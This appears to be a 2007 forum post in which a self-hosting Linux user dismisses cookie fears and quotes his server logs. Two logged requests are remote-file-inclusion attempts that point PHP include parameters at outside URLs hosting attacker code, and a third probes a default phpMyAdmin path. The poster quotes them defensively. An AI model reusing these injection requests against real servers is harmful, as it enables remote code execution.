There have been cookies that included executables and used to spread
viruses, spyware, and other malicious products.
I am not denying this is perhaps possible, but I know here every
link I clicked is stored for years, every email passes via NSA
evaluators, every phone call too, what not.
So 'spy'.. we are pretty much transparent now to the Rulers Of The World.
I have an email subscription to
http://www.buerger-cert.de , and on
regular basis receive email warnings about the next virus, bug, attack,
what not. If you can read German, try to subscribe to them.
Some tips are important, but not even my firefox is up to date, because if I needed
it to be up to date, then I would need to re-install a new version each week.
The same for adobe, realplayer, many other applications.
There is no 'safe' computer.
Cookies never gave me any problems, they are convenient if
I read news sites (like nytimes.com) and I am welcomed with
my own name etc.
Also the fact that I run Linux probably protects me, with the system online
now for several years 24/7, the only real dangerous attacks I have seen are the ones
trying to do http request to other servers via mine, ones trying obvious directories
to grab my databases, some recently to use holes in my wiki / blog.
Things like this:
213.60.19.182 cm19182.red.mundo-r.com - - [21/Nov/2007:04:26:54 +0100] "GET /kalendar/tools/send_reminders.php?includedir=
http://85.114.128.21/t.txt? HTTP/1.1" 404 887
Or this
195.188.8.14 195.188.8.14 - - [16/Nov/2007:18:12:58 +0100] "GET /pmwiki.php?GLOBALS[FarmD]=
http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 887
One recommendation from this, apart from firewalls etc:
DO NOT KEEP YOUR APPLICATIONS IN THEIR DEFAUT DIRECTORIES.
See them try:
66.43.88.82 mail.vividcollection.com - - [19/Nov/2007:18:38:53 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 887
It failed, because I do not keep things in phpMyAdmin-2.5.1 (he tried all other possible versions too, also for other programs).
Yes I expose those IPs, killfile them.
In my case they are semi-auto added to the firewall, never ever being able to even find my serverIP from the servername again,
as I also run the nameserver
Cookies? Nothing to worry about.